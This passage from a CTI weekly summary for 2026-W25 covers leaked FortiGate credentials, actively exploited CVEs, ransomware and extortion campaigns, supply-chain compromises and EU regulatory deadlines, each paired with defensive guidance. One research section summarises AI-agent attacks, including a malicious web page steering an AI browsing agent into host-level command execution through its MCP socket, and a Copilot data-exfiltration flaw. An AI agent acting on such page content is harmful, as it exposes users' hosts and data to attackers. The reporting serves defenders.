CTI Weekly Summary — 2026-W25 (Jun 15 – Jun 21, 2026)

FortiBleed — Russian-speaking operator cracking 86,644 FortiGate credentials into Active Directory

If you did nothing this week: any internet-facing FortiGate whose admin or SSL VPN credentials are in the "FortiBleed" corpus is a live initial-access foothold right now — patch level is irrelevant, because the leaked credential is the weapon, and the operator is already pivoting from validated VPN logins into internal Active Directory.

The FortiBleed dataset surfaced on 2026-06-17 as 73,932 unique FortiGate management URLs (~75,000 devices across 194 countries) paired with valid VPN and administrative credentials (BleepingComputer, 2026-06-17; daily 06-18). By 2026-06-19 the verified count had grown to 86,644 confirmed working credentials and CISA had issued an emergency hardening advisory (SecurityWeek, 2026-06-19; daily 06-20). Fortinet's PSIRT confirmed the campaign ties to previously disclosed incidents (FG-IR-26-060 / FG-IR-25-647) and that the credentials originated from exported device configurations — its position is that this is not a new CVE, the corpus being a reshare of prior-incident data combined with large-scale brute-forcing (Fortinet PSIRT, 2026-06-19) — but that distinction is cold comfort operationally: the credentials validate. The methodology that emerged this week is the load-bearing detail. A Russian-speaking actor intercepts SSL VPN authentication, cracks the captured hashes on a 45-GPU Hashtopolis cluster, and then uses the recovered service and admin accounts to move laterally into internal Active Directory (T1078 valid accounts following T1110 credential cracking).

The escalation that makes this § 1 rather than a routine credential-leak note is the AD pivot plus CISA's mandated response: terminate all SSL VPN sessions, reset every credential, migrate admin-hash storage from the older MD5-crypt scheme to PBKDF2, and enforce phishing-resistant MFA on all remote access. FortiGate is ubiquitous on Swiss and EU public-sector and telco perimeters, so treat any exposed device's local admin and VPN secrets as potentially in the corpus regardless of firmware version. Hunt for sequential VPN authentication failures from rotating residential IP ranges followed by a success and immediate internal RDP/SMB/LDAP reconnaissance, and cross-reference SSL VPN session logs against the Shadowserver notification feed.

CVE-2026-20253 — Splunk Enterprise pre-auth RCE flips to confirmed exploitation and CISA KEV

If you did nothing this week: if you run an internet-reachable Splunk Enterprise search head on 10.0.x or 10.2.x, you are now exposed to an unauthenticated remote-code-execution path that is being exploited in the wild — and a compromised search head sits at the centre of your detection and log visibility.

When CVE-2026-20253 (CVSS 9.8, CWE-306) was first covered on 2026-06-14 it was a disclosure-plus-patch story. This week Splunk PSIRT confirmed limited exploitation, CISA added it to the KEV catalog on 2026-06-18, and NCSC-NL corroborated (Splunk PSIRT SVD-2026-0603; SecurityWeek, 2026-06-19; daily 06-20). The flaw is an unauthenticated arbitrary file-creation/truncation primitive reachable through a PostgreSQL sidecar service endpoint that lacks authentication controls, chaining to RCE. It affects Splunk Enterprise 10.0 below 10.0.7 and 10.2 below 10.2.4; fixes (10.4.0 / 10.2.4 / 10.0.7) have been available since 2026-06-14.

The operational weight here is the platform, not the CVSS: Splunk is a standard SIEM backbone inside CH/EU public-sector SOCs, and an attacker who lands pre-auth code execution on the search-head tier owns the analytics plane that defenders rely on. Patch on emergency cadence, restrict search-job submission to authorised analyst accounts, and verify indexer/search-head network segmentation so the PostgreSQL sidecar is not network-reachable from untrusted zones.

CVE-2026-12569 — PTC Windchill / FlexPLM pre-auth deserialization RCE, exploited, BSI calling admins at 02:30

If you did nothing this week: if you run an internet-reachable PTC Windchill or FlexPLM instance, assume compromise — a pre-auth deserialization flaw on the login interface is being exploited to drop backdoors, and the German BSI considered it urgent enough to phone operators in the middle of the night.

CVE-2026-12569 (CVSS 3.1 10.0; CVSS 4.0 9.3) is an unsafe deserialization of untrusted data reachable on the web-based Windchill/FlexPLM login interface before authentication — no credentials, no prior foothold, no user interaction (NCSC-CH Security Hub, 2026-06-19; daily 06-20 deep dive). PTC shipped fixes on 2026-06-15 and auto-patched cloud tenants; affected on-premises builds span the 11.x, 12.0.x, 12.1.x, 13.0.x and 13.1.0.0–13.1.3.0 lines as well as releases prior to 11.0 M030 (PTC PSIRT). Both BSI and NCSC-CH treat it as actively exploited, with Heise reporting backdoor deployment on vulnerable servers and the BSI escalating to direct after-hours phone calls — a step reserved for its highest-urgency advisories (Heise Security, 2026-06-19).

Windchill and FlexPLM are the product-lifecycle-management backbone across DACH manufacturing, aerospace, automotive and the defence-industrial base, holding engineering crown jewels (CAD, BOMs, supplier data) behind increasingly internet-reachable supplier portals — which is exactly why the BSI mobilised. Patch every on-premises instance, confirm cloud tenants were auto-patched, and until then pull the login interface off the internet behind a VPN or authenticating reverse proxy. Hunt for Java deserialization exception bursts on the login path and for the Windchill application-server process (JBoss/WildFly/WebLogic) spawning shells or scripting interpreters (T1190 → T1505.003).

ShinyHunters extortion brand — Council of Europe named, Kodak and One Medical added to the leak-site pressure

The ShinyHunters extortion brand (the data-theft cluster Google tracks as UNC6240) ran on two fronts this week. The technical core remains the Oracle PeopleSoft zero-day campaign (CVE-2026-35273) consolidated in the W24 weekly, and Google's Threat Intelligence Group sharpened it this week: GTIG's analysis confirms UNC6240 exploited the flaw between 27 May and 9 June as a zero-day, has notified 100+ organisations (68% in higher education), and documented the TTPs — JSP shell implant, a customised MeshCentral agent masquerading as Azure cloud endpoints, [victim]_fanout.sh SSH credential-spraying and zstd-compressed exfiltration (Google GTIG). On 2026-06-16 ShinyHunters listed the Council of Europe — the 46-member Strasbourg human-rights body of which Switzerland is a member — claiming roughly 297 GB exfiltrated; per W1's assessment it is the only named European-institution victim in the campaign to date (SecurityWeek, 2026-06-16; daily 06-16). In parallel the brand expanded its leak-site extortion pressure beyond PeopleSoft: Eastman Kodak confirmed on 2026-06-17 that "an unauthorized third party illegally gained access to a limited amount of company data" after a ShinyHunters listing (SecurityWeek, 2026-06-19; daily 06-20), and Amazon's One Medical confirmed a legacy third-party file-storage breach while ShinyHunters' unverified 8.8 TB claim ran a deadline that expired 2026-06-21 (BankInfoSecurity, 2026-06-20; daily 06-21).

The cross-day pattern for a CH/EU SOC: the same brand is simultaneously running a confirmed enterprise-SaaS zero-day (PeopleSoft, vendor-confirmed) and a higher-noise leak-site operation where claims (Kodak data volume, the One Medical 8.8 TB figure) are attacker-asserted and partly unverified. Triage the two differently — the PeopleSoft exposure is a patch-and-hunt emergency for internet-reachable instances; the leak-site listings warrant victim-notification monitoring but the headline data volumes should be treated as unconfirmed until the victim corroborates.

The Gentlemen — EDR-killer framework documented, OT-adjacent victim claimed, operator named

The Gentlemen RaaS operation moved from tooling disclosure to victim impact to attribution across three days. On 2026-06-18 ESET published a months-long investigation showing the gang centrally builds and maintains its affiliates' GentleKiller EDR-killer framework — a structural departure from the affiliate norm in which each affiliate sources its own evasion tooling (ESET, 2026-06-19; daily 06-19). On 2026-06-18 Mackay Sugar — Australia's second-largest sugar producer — confirmed an intrusion around 10 June that halted milling at two of three mills, an OT-adjacent impact the group later claimed (The Record, 2026-06-18; daily 06-20). Separately, KrebsOnSecurity published OSINT attribution identifying the group's administrator ("Hastalamuerte" / "Zeta88") as a 36-year-old from Izhevsk, Russia, who reportedly uses AI tooling to develop ransomware and assist post-exploitation (KrebsOnSecurity, 2026-06-10).

The defender signal is the centralised EDR-killer model: because the BYOVD evasion tooling is built once and pushed to all affiliates, detection content that catches GentleKiller's driver-load and EDR-tamper behaviour generalises across every affiliate intrusion rather than needing per-affiliate tuning. The Krebs attribution is an analytical claim, not an indictment — treat it as context, not actionable IOC.

Klue / Icarus — one dormant integration credential cascades into multi-tenant Salesforce CRM theft

The Icarus extortion actor turned a single legacy credential at a SaaS integration vendor into bulk CRM theft across that vendor's customer base. First covered 2026-06-19: Icarus (active since ~April 2026) compromised the backend of Klue Battlecards — a competitive-intelligence SaaS that integrates with customer Salesforce tenants over OAuth — obtained a dormant/prototype-integration credential, injected code into Klue's application layer to harvest each customer's stored Salesforce OAuth access tokens, then queried the Salesforce REST API directly for ~24 hours per victim before Salesforce flagged the anomaly (ReliaQuest, 2026-06-17; daily 06-19). By 2026-06-21 the named victim list had grown to include Huntress, Recorded Future, Tanium and Jamf, the harvested tokens spanned Salesforce plus Gong, HubSpot and SharePoint, and Huntress forensics tied the abuse to Salesforce REST calls at /services/data/v59.0/query/ carrying a python-urllib User-Agent (Klue, 2026-06-19; Huntress, 2026-06-18; daily 06-21).

The chain — compromise an integration platform's legacy credential, harvest downstream OAuth tokens, query customer CRM APIs from the platform's legitimate IP range (T1199 → T1528 → T1078.004 → T1530) — bypasses every endpoint and network control the victim operates, and is the same trust-path class as the broader Salesforce-OAuth extortion wave. For CH/EU SOCs the takeaway is governance of delegated-OAuth grants: inventory and revoke dormant third-party SaaS integrations, enforce IP restrictions and short token TTLs on connected-app policies, and stream Salesforce Event Monitoring for non-user API principals and python-urllib-style callers.

CVE-2026-0257 — Palo Alto Networks PAN-OS GlobalProtect: authentication bypass under active exploitation

First disclosed in May and KEV-listed on 2026-05-29, the GlobalProtect portal/gateway authentication bypass moved into a confirmed exploitation wave this week. Unit 42 observed active exploitation by an unidentified actor attempting to access GlobalProtect, with Arctic Wolf reporting increasing exploitation volume and NCSC-CH refreshing its advisory on 2026-06-16 (Unit 42; daily 06-17). Notably, Unit 42 states no post-access lateral movement had been identified as of its analysis — so the current operational signal is unauthorised VPN session establishment, not yet confirmed downstream compromise. Patch to the fixed PAN-OS trains, and hunt GlobalProtect logs for authentications that bypass the expected portal flow.

CVE-2026-20262 — Cisco Catalyst SD-WAN Manager: authenticated arbitrary file write to root, exploited as a zero-day (CISA KEV)

A path-traversal weakness in the web UI of Cisco Catalyst SD-WAN Manager (formerly vManage) lets an authenticated remote attacker create or overwrite any file on the underlying OS and escalate to root code execution; Cisco patched it after zero-day exploitation and CISA added it to KEV (Cisco PSIRT; daily 06-16). SD-WAN Manager is the centralised control plane for an entire SD-WAN fabric, so a rooted controller is a fabric-wide compromise. Patch on emergency cadence and restrict management-plane access to a dedicated administrative network.

CVE-2026-48907 — Joomla Content Editor (JCE): unauthenticated profile-import to PHP RCE (CVSS 4.0 10.0, CISA KEV)

JCE is one of the most widely installed Joomla editors across European universities, municipalities and community portals. CVE-2026-48907 chains weaknesses in the profile-import workflow into unauthenticated PHP remote code execution, is rated CVSS 4.0 10.0, and was KEV-listed on 2026-06-16 (Widget Factory / JCE; YesWeHack; daily 06-17). Update to JCE 2.9.99.5 or later; the vendor also shipped a free patch for older sites.

CVE-2026-54420 — LiteSpeed cPanel/WHM plugin: symlink-following on shared hosting, exploited (CISA KEV)

The LiteSpeed cPanel plugin before 2.4.8 mishandles user-supplied symlinks on CloudLinux/CageFS shared hosting, letting a user with FTP or web-shell access escalate; it is exploited in the wild and KEV-listed (LiteSpeed; daily 06-16). Relevant to any public-sector or education entity running shared cPanel hosting. Update to the LiteSpeed WHM PlugIn version 5.3.2.1.

CVE-2026-25089 / CVE-2026-39808 / CVE-2026-39813 — FortiSandbox: three critical flaws exploited in one 24-hour window

What was disclosure-only on 06-12 became active exploitation this week: Defused Cyber reported three FortiSandbox flaws exploited within a single 24-hour window — a JRPC OS command injection (CVE-2026-39808, 9.8), a JRPC path-traversal/auth-bypass (CVE-2026-39813, 9.1), and the web-UI command injection (CVE-2026-25089, 9.8) (Security Affairs; daily 06-17). FortiSandbox supplies the verdicts FortiGate, FortiMail, FortiProxy and FortiClient consume, so a compromised sandbox can suppress detection across the dependent Fortinet stack. The CVE-2026-25089 in-the-wild exploit appears AI-generated and faulty yet still finds traction against unpatched interfaces; Fortinet has not officially confirmed exploitation. Patch all three and restrict management-interface exposure.

CVE-2026-4020 — Gravity SMTP WordPress plugin: unauthenticated credential dump, mass-exploited

An unauthenticated information-disclosure flaw in the Gravity SMTP plugin (all versions through 2.1.4) lets an attacker dump the configured email-connector credentials (SMTP, SendGrid, Mailgun and similar API keys), and it is being mass-exploited (GitHub Advisory GHSA-jxfc-8wcq-xxcg; daily 06-21). Stolen mail-sending credentials enable downstream phishing from a trusted domain. Update the plugin and rotate every credential stored in it.

CVE-2026-50751 — Check Point Security Gateway IKEv1 VPN authentication bypass: public PoC, Qilin affiliate use

Status update on the W24 § 1 item: NCSC-NL updated its advisory on 2026-06-16 to note public proof-of-concept code is now available for the IKEv1 VPN authentication bypass, which a Qilin ransomware affiliate has used for initial access (Help Net Security; NCSC-NL NCSC-2026-0179; daily 06-17). A Remote Access VPN gateway still running the deprecated IKEv1 path is an active ransomware entry point. Apply the Check Point hotfix and disable IKEv1 where IKEv2 can replace it.

CVE-2026-46978 / CVE-2026-35278 — Oracle June 2026 CSPU: unauthenticated Solaris RAD flaw (10.0) and PeopleSoft RCE (9.8)

Oracle's June Critical Security Patch Update shipped 245 fixes on 2026-06-17, around 100 remotely exploitable without authentication, headlined by an unauthenticated Solaris Remote Administration Daemon flaw (CVE-2026-46978, CVSS 10.0) and a PeopleSoft RCE (CVE-2026-35278, 9.8) (Oracle CSPU; daily 06-18). The PeopleSoft fix lands in the middle of the ShinyHunters PeopleSoft campaign (§ 2) — prioritise PeopleSoft and any internet-reachable Solaris RAD instances.

CVE-2026-20181 / CVE-2026-20190 — Cisco Identity Services Engine: unauthenticated credential read chaining to root command execution

Two flaws in Cisco ISE and the ISE Passive Identity Connector let an unauthenticated attacker read credentials (CVE-2026-20181, 9.1) that chain to authenticated root command execution (CVE-2026-20190, 7.5); BSI flagged the pair for DACH operators (Cisco PSIRT; daily 06-19). ISE is the network-access-control and policy backbone in many enterprise and public-sector networks — a rooted ISE undermines NAC posture wholesale. Patch promptly.

CVE-2026-0647 et al. — Rockwell Automation FLEX I/O unauthenticated password reset (9.4) and Logix CIP DoS, flagged by NCSC-CH

Rockwell disclosed five ICS CVEs on 2026-06-16, consolidated by NCSC-CH on 2026-06-17 and CISA ICS-CERT, headlined by an unauthenticated FLEX I/O password reset (CVE-2026-0647, 9.4) and Logix CIP denial-of-service flaws (CISA ICS-CERT ICSA-26-167-05; NCSC-CH Security Hub; daily 06-18). Directly relevant to Swiss/EU energy, water and manufacturing OT operators. Patch on the OT change-management cycle and verify these controllers are not reachable from IT networks.

CVE-2026-55803 / CVE-2026-55804 — Drupal core: PHP object-injection chain in JSON:API, BSI-rated critical

The Drupal Security Team published six advisories on 2026-06-17 (fixed in 10.5.12, 10.6.11, 11.2.14, 11.3.12); BSI escalated the aggregate to kritisch (Drupal SA-CORE-2026-005; BSI CERT-Bund; daily 06-19). Drupal runs a large share of European government and university sites, making this a public-sector CMS patch priority. Update core immediately.

Public administration — named European institutions and government data in the firing line

The public sector again carried high-severity activity on multiple vectors. The Council of Europe — a Strasbourg human-rights body of which Switzerland is a member — was named in the ShinyHunters PeopleSoft campaign (§ 2). Iran-aligned Handala breached California Water Service through an internet-exposed RTKBase GNSS platform, leaking billing PII for ~2M customers though without OT access (SecurityWeek, 2026-06-14; daily 06-15). Texas Parks & Wildlife disclosed a third-party-vendor breach exposing 3.08M licence holders' names and driver's-licence numbers (BleepingComputer, 2026-06-18; daily 06-21). And the recurring lesson for CH/EU administration is the PTC Windchill emergency (§ 1), where the BSI's after-hours calls underline how government CERTs are now treating internet-exposed public-sector and industrial software.

Education — exposed CMS and forum software stack a structural risk

Education entities sat under two pressures this week: the continuing ShinyHunters PeopleSoft campaign that W24 documented landing disproportionately on universities, and a cluster of critical web-application CVEs in software ubiquitous across European universities and student communities — JCE for Joomla (CVE-2026-48907, exploited), phpBB (CVE-2026-48611), Drupal core (CVE-2026-55803, BSI critical) and LiteSpeed shared-hosting (CVE-2026-54420, exploited), all in § 3. The pattern is not a single incident but an attack-surface concentration: the open-source CMS/forum/hosting stack that the education sector runs widely all took critical, partly-exploited disclosures in one week.

Healthcare — third-party exposure and a 16-month notification gap

Healthcare breaches this week were dominated by third-party and disclosure-timing failures rather than direct perimeter compromise. iRhythm filed an SEC 8-K reporting data theft via social engineering of a third-party-hosted application (SEC 8-K, 2026-06-15; daily 06-16). HCRG Care Group began notifying patients in June 2026 of a Medusa ransomware attack that occurred in February 2025 — a 16-month gap between incident and notification (HIPAA Pulse, 2026-06-20; daily 06-21). Amazon's One Medical confirmed a legacy-storage breach (§ 2). The defender takeaway: most healthcare exposure this week entered through suppliers and legacy systems, not the front door.

Energy, water & OT — perimeter and process failures, with an OT-adjacent halt

Critical-infrastructure exposure ran from cyber intrusion to physical mishandling. Handala's Cal Water breach (above) and the Rockwell ICS advisory batch (§ 3) bracket the cyber end; at the process end, a Kyushu Electric subsidiary lost an unencrypted portable SSD holding ~10.9M customer records — reportedly Japan's largest personal-data breach (BleepingComputer, 2026-06-14; daily 06-14). The Gentlemen's Mackay Sugar claim (§ 2) halted milling at two of three mills — an OT-adjacent production impact even without confirmed OT-network compromise.

Technology & SaaS supply chain — the week's busiest victim class

The most active victim class was technology and SaaS, reflecting the week's supply-chain theme (§ 6). Klue/Icarus (§ 2) cascaded through a SaaS integrator's customer base; Nintendo employee data was stolen from third-party HR-survey SaaS TinyPulse, not Nintendo's own systems (BleepingComputer, 2026-06-20; daily 06-20); a WordPress supply-chain compromise via Awesome Motive's CDN backdoored ~1.2M sites (Sansec, 2026-06-16; daily 06-16); and the Mastra npm scope compromise was attributed to North Korea (§ 6). The cross-cutting lesson: the breach increasingly enters through a vendor's plumbing, not the victim's perimeter.

Law-enforcement momentum — Operation Endgame expands, Silver Fox mass-arrest, Conti loader plea

The week was unusually strong on enforcement follow-through. A coordinated international action on 2026-06-18 expanded Operation Endgame to SocGholish/TA569, dismantling 106 C2 servers and stripping the FakeUpdates loader from 14,971 WordPress sites (Politie, 2026-06-18; daily 06-19). Chinese police arrested 67 members of the Silver Fox (Winos/ValleyRAT) cybercrime network across five provinces (Risky Business, 2026-06-18; daily 06-18), and Conti loader developer Oleksii Lytvynenko pleaded guilty in US federal court after extradition from Ireland (Global Security, 2026-06-12; daily 06-14). For defenders, the Endgame action is the operationally useful one: SocGholish/FakeUpdates is a standard initial-access broker for ransomware, so the takedown measurably degrades a common entry path — though TA569's history of rebuilding means the relief is likely temporary.

Insider and process failures — Munich school data, a lost SSD, and an NHS records caution

Several of the week's incidents were not external intrusions at all. Munich's municipal IT subsidiary is investigating ~120,000 student records suspected on the darknet, with a terminated employee under investigation (Heise, 2026-06-17; daily 06-17). The Kyushu Electric SSD loss (§ 4) was a physical-custody failure. And the UK ICO closed a two-year criminal investigation into deliberate misuse of Catherine, Princess of Wales' medical records at The London Clinic with a formal caution (ICO, 2026-06-19; daily 06-19). The common thread: privileged-insider and data-custody controls — offboarding, removable-media encryption, and access auditing on sensitive records — are as consequential as perimeter defence.

The third-party breach as the week's dominant entry vector

The clearest cross-cutting theme of the week's incidents is that the breach increasingly entered through someone else's systems. iRhythm (social-engineered third-party app), Nintendo (TinyPulse HR SaaS), Texas Parks & Wildlife (unnamed licensing vendor) and the Klue/Icarus cascade (§ 2) all share the same root pattern: the victim's own perimeter held, but a supplier's did not. This is the operational case for extending vendor-access governance — OAuth-grant inventory, supplier breach-notification SLAs, and least-privilege on integration credentials — into the same tier as perimeter hardening, because that is where this week's data actually left.

Research: the AI agent and toolchain control plane became a concrete attack-surface class this week

The week's single most important research synthesis is that the AI developer toolchain — gateways, agents, IDE plugins and the Model Context Protocol — stopped being a theoretical risk and accumulated a cluster of working exploit chains. Microsoft's AutoJack showed a single malicious web page can drive host-level RCE through an AI browsing agent's local MCP WebSocket: a three-flaw chain in AutoGen Studio (origin-allowlist bypass, missing auth on /api/mcp/*, and OS command injection via StdioServerParams) lets an attacker-steered agent reach a privileged localhost socket and execute arbitrary host processes (Microsoft Security, 2026-06-18; daily 06-20). That sits alongside the week's other AI-surface disclosures: Obsidian Security's three-CVE LiteLLM chain turning any gateway user into root (Obsidian, 2026-06-16; daily 06-16), Varonis "SearchLeak" one-click M365 Copilot data exfiltration (CVE-2026-42824) (Varonis; daily 06-16), Unit 42's "Pickle in the Middle" cross-tenant code execution in Google Vertex AI (CVE-2026-2473) (Unit 42; daily 06-17), and 15 malicious JetBrains Marketplace plugins exfiltrating AI-provider API keys (Aikido; daily 06-18). Sophos X-Ops' underground-AI report (daily 06-19) confirms criminal interest in exactly these agent frameworks. The defender takeaway for CH/EU public-sector teams adopting AI tooling: treat self-hosted AI gateways and agent frameworks as internet-adjacent application servers — bind MCP/agent sockets to loopback behind a host firewall, run them under low-privilege isolated accounts, never on shared or production hosts, and rotate the API keys and cloud credentials these tools concentrate.

Research: ClickFix matured into a productised malware-as-a-service supply chain

A second cross-day research thread: the ClickFix technique — fake browser/update dialogues that trick users into pasting attacker PowerShell — has industrialised. Sekoia documented ErrTraffic, a ClickFix Malware-as-a-Service framework that resolves its C2 through the Polygon blockchain (Sekoia, 2026-06-17; daily 06-17), and Huntress detailed the Potemkin loader delivering RMMProject RAT through a ClickFix chain that also bypasses Chromium App-Bound Encryption (Huntress, 2026-06-17; daily 06-17). ErrTraffic also surfaced as one of the SocGholish-adjacent clusters still operating after the Operation Endgame takedown (§ 8). The pattern for defenders: ClickFix is now a delivery channel with multiple competing operators and resilient C2, so user-paste-to-PowerShell detection (clipboard-sourced powershell.exe/mshta.exe invocations, RunMRU artefacts) is worth promoting from awareness training to a standing hunt.

Threat actor: DPRK Sapphire Sleet escalates npm supply-chain attacks with the Mastra compromise

Microsoft attributed the Mastra npm scope compromise — first covered as an unattributed supply-chain event on 2026-06-18 — to Sapphire Sleet (BlueNoroff / UNC1069), making it the actor's second major npm strike of 2026 after the April Axios attack (Microsoft Security, 2026-06-17; BleepingComputer, 2026-06-18; daily 06-21). The operators compromised a maintainer account whose scope access was never revoked and published 140+ malicious @mastra packages within a ~20-minute window, using an easy-day-js typosquat of dayjs to run a postinstall dropper with cross-platform persistence (Registry Run key, macOS LaunchAgent, Linux systemd unit) that exfiltrated browser-wallet extensions, cloud credentials, LLM API keys, CI/CD tokens and SSH keys. The recurrence establishes a clear DPRK pattern of targeting the AI developer toolchain's supply chain specifically — the same surface § 6's first item flags. Run npm install --ignore-scripts in CI, pin lockfile versions, and rotate credentials on any host that pulled @mastra packages in the days before the 17 June disclosure.

Threat actor: FishMonger (I-SOON) ports SprySOCKS to Windows with a kernel-mode rootkit

ESET's full research paper detailed two previously undocumented Windows variants of the SprySOCKS backdoor attributed to FishMonger (Earth Lusca / Aquatic Panda — the Winnti-contractor tracked as I-SOON), centred on a RawWNPF.sys kernel driver that hides processes (NtQuerySystemInformation hook), network connections (nsiproxy.sys IOCTL interception), files (minifilter callbacks) and persistence registry keys, and redirects crafted TCP packets to a hidden backdoor port via the Windows Filtering Platform (ESET, 2026-06-16; daily 06-17). Background: FishMonger has been publicly tracked since the 2024 I-SOON contractor-leak exposed its government-espionage-for-hire model; ESET's earlier work documented the Linux SprySOCKS lineage, and this report extends the toolkit to a Windows kernel rootkit with a possible UEFI-bootkit component (leveraging the patched BlackLotus Secure Boot bypass, CVE-2023-24932). Confirmed victims are government organisations in Honduras, Taiwan, Thailand and Pakistan; the targeting class — government and defence — keeps EU government networks in scope. Enable the vulnerable-driver blocklist, hunt for the named driver and for process/network-hiding behaviours, and verify Secure Boot is at current patch level.

Threat actor: INC ransomware's Rust rewrite and BYOVD evolution

Acronis and The Hacker News documented the evolution of INC ransomware into a top-tier RaaS — 830+ victims since 2023, fourth in Q1 2026 — with a Rust rewrite of its Windows and Linux/ESXi encryptors, BYOVD EDR-termination using the drivers filwfp.sys / filnk.sys / fildds.sys (the same set seen in earlier Vanilla Tempest campaigns), a Veeam credential dumper for backup infrastructure, and two source-code-leak-derived variants (Lynx, Sinobi) (Acronis TRU, 2026-06-18; The Hacker News, 2026-06-19). The geography is incidental for a CH/EU SOC — the cited reporting puts the majority of INC's victims in the US — but the tradecraft is not: the three BYOVD drivers (shared with earlier Vanilla Tempest campaigns), the Veeam backup-credential dumper, and the cross-platform Rust encryptor are detection content that generalises to any victim. Detect the three BYOVD drivers via driver-load events with a hash blocklist, alert on Veeam process-memory access from unexpected parents, and keep backup systems MFA-protected and network-isolated.

Research: usbliter8 — an unpatchable SecureROM boot-chain exploit for Apple A12/A13 silicon

Paradigm Shift published usbliter8, a working SecureROM (burned-in, unpatchable boot code) exploit for Apple A12 and A13 SoCs via a hardware-level USB DMA buffer underflow combined with a firmware configuration flaw, achieving pre-boot arbitrary code execution in under two seconds (9to5Mac, 2026-06-18; daily 06-20). It requires physical possession in DFU mode with a dedicated RP2350 board; the Secure Enclave is not compromised, so passcodes and encrypted user data remain protected — the risk class is forensic/intelligence-collection on seized devices, not remote exploitation. For CH/EU public-sector MDM/BYOD fleets the operational consequence is a hardware-refresh planning input: affected devices (iPhone XR/XS/11 generations, several iPads, older Apple Watches and HomePod mini) cannot be patched, so high-sensitivity-role devices on A12/A13 silicon should be prioritised for replacement and protected with physical-custody controls.

DORA Year 1 — the ESAs' first annual ICT-incident report: 3,383 major incidents, a third cross-border, only ~10% cyber

The European Supervisory Authorities (EBA, EIOPA, ESMA) published their first annual overview of major ICT-related incidents reported under DORA, covering 2025 (EBA, 2026-06-03; EIOPA, 2026-06-03). The findings most useful to a defender: 3,383 major incidents across EU financial sectors; roughly one-third had cross-border impact — the borderless-interconnection risk the DORA reporting regime exists to surface, with the ESAs stating "ICT risks are increasingly borderless and interconnected"; and cybersecurity incidents made up only ~10% of the total, with system failures and operational events dominating. The ESAs explicitly flag AI-driven attack tooling as an emerging multiplier that could shift that baseline rapidly. For Swiss financial entities under FINMA — not bound by DORA but operating to comparable operational-resilience expectations — the report is a useful peer benchmark for what a European incident profile looks like under comparable obligations.

Check Point State of Ransomware Q1 2026 — ecosystem consolidation, with Switzerland and Germany named

Surfaced this week for its CH/EU-specific findings, Check Point's Q1 2026 ransomware report (published 11 May, not covered in the dailies) documents a structural consolidation: the top 10 groups now hold 71.1% of all leak-site victims, the highest concentration since early 2024 and a reversal of two years of fragmentation — meaning defenders face fewer but more professionalised adversaries (Check Point Research; corroborated by Emsisoft). The Gentlemen grew +315% quarter-on-quarter (explaining this week's Mackay Sugar and GentleKiller coverage in § 2) and LockBit 5.0 resurged +106% on a Rust rewrite. The geography is the operative detail for this audience: Switzerland — Check Point notes Akira accounts for roughly 31% of Swiss ransomware victims, and Germany is the #2 country globally for ransomware victims (Emsisoft). The synthesis a Swiss SOC should take: Akira is the dominant ransomware threat to model against domestically, and the consolidation trend favours investing detection effort against a smaller set of high-capability operators (Qilin, Akira, The Gentlemen, LockBit 5.0).

Chaotic Eclipse / Nightmare Eclipse zero-day wave — RoguePlanet (CVE-2026-50656) still unpatched, PoC works on June builds

key: item:nightmare-chaotic-eclipse-zero-day-wave-the-defender-lpe-now. The serialised Windows zero-day campaign the W24 weekly consolidated has a worsening status. As of 2026-06-21, CVE-2026-50656 (RoguePlanet) remains unpatched. The exploit abuses a Time-of-Check-to-Time-of-Use race in Microsoft Defender's file-processing workflow (CWE-59): Defender checks a file path under SYSTEM, then reopens it, and the exploit swaps the file in the gap to get SYSTEM-level execution (Help Net Security, 2026-06-17; MSRC; daily 06-19). The PoC is validated against fully-patched Windows 10 and 11 including the June 2026 Patch Tuesday build, Real-Time Protection status is irrelevant, and the researcher states small PoC changes defeat mitigations — "the only thing you can realistically do is wait for a patch." Microsoft confirms a fix is in development with no timeline. This is post-initial-access privilege escalation (local auth required), so it compounds rather than initiates a breach; until a patch ships, the realistic controls are application allowlisting to constrain post-exploitation and hunting for MsMpEng.exe spawning unexpected children or temp-directory symlink manipulation timed to scans. Outstanding question to watch: whether Microsoft ships an out-of-band fix or holds it to July Patch Tuesday.

SocGholish / TA569 — Operation Endgame seized 106 servers, but seven delivery clusters remain operational

key: item:operation-endgame-expands-to-socgholish-ta569-106-c2-servers. The Operation Endgame takedown (§ 5) was the headline; Proofpoint's post-action analysis is the status update that matters for the longer arc. TA569 served for years as a primary distribution layer for WastedLocker (Evil Corp), LockBit and RansomHub, and while law enforcement seized over 100 servers and 14,971 WordPress sites were remediated, seven FakeUpdates-style clusters remain operational — TA2726, TA2727, ZPHP, ErrTraffic (the ClickFix MaaS in § 6), LandUpdate808/KongTuke, GeoTDS and tdsshop (Proofpoint, 2026-06-18; daily 06-19). Proofpoint also notes WordPress sites frequently reinfect because the underlying credential compromise outlives CMS-level cleanup. The defender consequence: the fake-update initial-access vector is degraded, not closed — keep GPO restrictions on JScript/WSH execution from user-writable paths, browser isolation for email links, and (for WordPress operators) full credential rotation plus FIM after any cleanup, because removing the loader without rotating credentials invites reinfection.

EDPB adopts a harmonised GDPR Article 33 breach-notification template — consultation open to 5 August

The EDPB adopted a draft common EU/EEA personal-data-breach notification template at its June plenary and opened public consultation until 5 August 2026 (EDPB, 2026-06-10). The template is a structured common form with predefined answer options and fill-in guidance, designed to replace the current patchwork in which each national DPA maintains its own notification form. After 5 August the EDPB will publish a timeline for mandatory adoption by all DPAs — the point at which it becomes the channel. What defenders should do differently: breach-response process owners with multi-jurisdiction obligations should review the draft now and begin aligning their incident-response notification playbooks to the common template. Swiss organisations under the nFADP have no direct EDPB obligation but need aligned preparation for any EU-nexus incident notifiable to an EU DPA.

CRA reporting obligation lands 11 September — ENISA Single Reporting Platform access manual due, dry-runs before go-live

The first Cyber Resilience Act obligation to bind, from 11 September 2026, requires manufacturers of products with digital elements to report actively exploited vulnerabilities (24-hour early warning + 72-hour notification + final report) and severe incidents through ENISA's Single Reporting Platform (EC Digital Strategy; ENISA SRP). ENISA committed to publishing access manuals and registration instructions during June 2026 with a dry-run period before go-live. Swiss companies exporting products with digital elements to the EU are directly in scope, with NCSC/GovCERT.ch as the designated national-CSIRT counterpart for the simultaneous-notification routing. With the deadline ~82 days out, in-scope manufacturers should begin SRP registration preparation and build the 24/72-hour reporting workflow into their PSIRT process now.

NIS2 transposition remains incomplete — France and Spain still among the laggards

